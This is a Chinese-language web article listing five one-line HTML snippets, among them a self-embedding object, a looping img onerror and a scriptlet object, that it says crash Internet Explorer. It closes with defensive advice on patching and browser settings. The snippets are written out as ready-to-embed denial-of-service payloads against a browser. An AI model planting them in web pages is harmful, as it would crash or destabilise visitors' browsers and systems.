上一篇：收藏经典:windows消息大全 >>

一行代码崩溃IE

微软产品素以bug众多著称，其中windows系统和ie浏览器更是bug多多。对于ie浏览器，甚至简单的一行代码就能使它崩溃。所谓ie崩溃，就是所有的ie浏览器窗口关闭，乃至引起系统出错、死机等。在网页中嵌入以下几种代码就能引起ie崩溃。

　　1.object对象链接和嵌入元素循环调用能导致ie崩溃：

　　＜!-
　　此代码所在的文件名应为crash.htm
　　--＞
　　＜object data=″crash.htm″ type=″text/html″＞＜/object＞

　　2.包含恶意image标签的html页面能导致系统进程的无限循环，从而引起ie崩溃。对windows9x操作系统，还会引起系统不稳定：

　　＜img src=″::″ ＆#111nerror=″this.src='::';″＞
　　对于这个bug微软已经提供了补丁，如果你的系统打了这个补丁的话，你会看到一个弹出警告窗口：

　　　　stack overflow at linex（在某行栈溢出）。

　　3.包含恶意avi object的html页面能引起ie崩溃：

　　＜object classid=″clsid00022613-0000-0000-c000-000000000046″＞＜/object＞

　　4.一个包含特殊object对象内容的html页面将导致dos攻击，引起ie崩溃：

　　＜object data=″#″ type=″text/x-scriptlet″＞＜/object＞

　　5.畸形的input标签导致ie崩溃：

　　＜input type＞

　　上面罗列的只是一些简单的代码，但能让ie崩溃的恶意代码又何止这些，ie的漏洞也不仅仅是崩溃，严重的漏洞能让心怀恶意者对用户的电脑为所欲为。ie作为绝大多数网民使用的浏览器，加强它的安全性势在必然，如及时打补丁、安装杀毒软件（可查杀一些恶意代码）、不访问不可靠的网站、提高浏览器的安全级别（如禁用activex、禁止脚本、阻止cookie）等。

（）

返回顶部

下一篇：脚本安全和利用 >>